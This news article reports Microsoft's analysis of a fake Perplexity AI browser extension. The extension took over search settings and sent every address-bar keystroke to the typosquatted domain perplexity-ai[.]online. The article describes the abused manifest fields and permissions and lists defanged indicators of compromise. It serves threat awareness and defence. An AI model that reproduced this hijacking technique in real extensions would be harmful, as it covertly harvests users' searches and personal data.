A fake browser extension disguised as the popular AI search tool Perplexity AI has been caught quietly capturing users’ real-time search inputs and browser signals, raising serious concerns about how easily trusted brand names can be used against ordinary users.
The extension, which went by the name “Search for perplexity ai,” was built to look and feel like a legitimate AI productivity tool, making it genuinely difficult for everyday users to detect anything suspicious.
The malicious extension targeted Chromium-based browsers and took full control of the browser’s default search settings the moment it was installed.
Every query a user typed, even before hitting Enter, was silently routed through attacker-controlled infrastructure before landing on familiar search engines like Google or Bing. To the user, everything appeared to work normally, which is exactly what made this threat so effective.
Analysts at Microsoft identified this extension and noted that its primary goal was search traffic interception and data collection.
Microsoft said in a report shared with Cyber Security News (CSN) that the operation could enable downstream misuse such as user profiling, targeted advertising, or other privacy violations depending on the intent of those running it.
After responsible disclosure, Google removed the extension from the Chrome Web Store. What set this threat apart from older search hijackers was its use of modern browser technology to stay completely hidden.
Instead of triggering obvious redirects, the extension used browser-native APIs to blend its malicious activity into normal browsing behavior, giving it the ability to operate quietly while logging everything the user typed into the address bar.
The extension also shipped with its own server-side code, an unusual detail that revealed the full scale of the operation.
That server code was designed to log all incoming requests, including full HTTP headers, user-agent strings, and IP addresses, confirming that data collection was deliberately and architecturally built in from the very start.
Fake Perplexity AI Extension
The extension registered itself as the browser’s default search provider using chrome_settings_overrides, replacing the built-in search with its own typosquatted domain, perplexity-ai[.]online.
This domain closely resembled the legitimate perplexity[.]ai service, making the switch nearly invisible to anyone not actively checking their browser settings.
Landing page of perplexity-ai[.]online (Source – Microsoft)
Critically, the suggest_url field in the extension’s configuration also pointed to the attacker’s domain. This meant that every character typed into the address bar, before any search was submitted, was sent to attacker-controlled infrastructure.
The server at perplexity-ai[.]online would then log the full request before redirecting the browser to the real search engine, completing the data theft in a way that left users completely unaware.
The extension requested three powerful network permissions: declarativeNetRequest, declarativeNetRequestFeedback, and declarativeNetRequestWithHostAccess.
Manifest.json configuration of the analyzed extension (Source – Microsoft)
Together, these allowed it to redirect traffic, monitor which interception rules fired, and intercept requests on the attacker’s domain, capabilities that go well beyond anything a legitimate AI search assistant would ever need.
Modular Design and Onboarding Deception
Upon installation, the extension opened an onboarding page hosted at extension.tilda[.]ws/perplexityai, presenting users with what looked like a perfectly normal product setup flow.
This technique is commonly used in extension-based adware campaigns to build user trust and reduce suspicion while silent browser changes take effect in the background.
Onboarding page launched by the extension after installation (Source – Microsoft)
The extension’s rule set was modular, with separate rule files for Perplexity, Google, and Bing traffic, though only the Perplexity ruleset was active.
The disabled Google and Bing rulesets suggested the operator could expand the campaign’s reach with minimal effort, simply by enabling additional rules to capture searches across more platforms.
To reduce exposure to this threat, Microsoft recommends that organizations restrict extension installs to an approved list and enforce enterprise browser policies in managed environments.
Users should verify the publisher and domain of any extension before installing it, especially AI-themed tools, which have become a popular lure in social engineering campaigns.
Organizations should also monitor for unauthorized changes to browser search settings and watch for outbound traffic to unfamiliar or intermediary domains.
Indicators of Compromise (IoCs):-
TypeIndicatorDescriptionDomainperplexity-ai[.]onlineTyposquatted domain used for search query interception and redirectionExtension IDflkebkiofojicogddingbdmcmkpbplcdMalicious Chromium browser extension identifierURLextension.tilda[.]ws/perplexityaiInstallation onboarding page shown to users upon extension install
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Strengthen Your SOC by Accelerating Threat Detection & Rapid Investigations. -> Integrate ANY.RUN With Your SOC Now.
The post Fake Perplexity AI Extension Captures Real-Time Search Suggestions and Browser Signals appeared first on Cyber Security News.
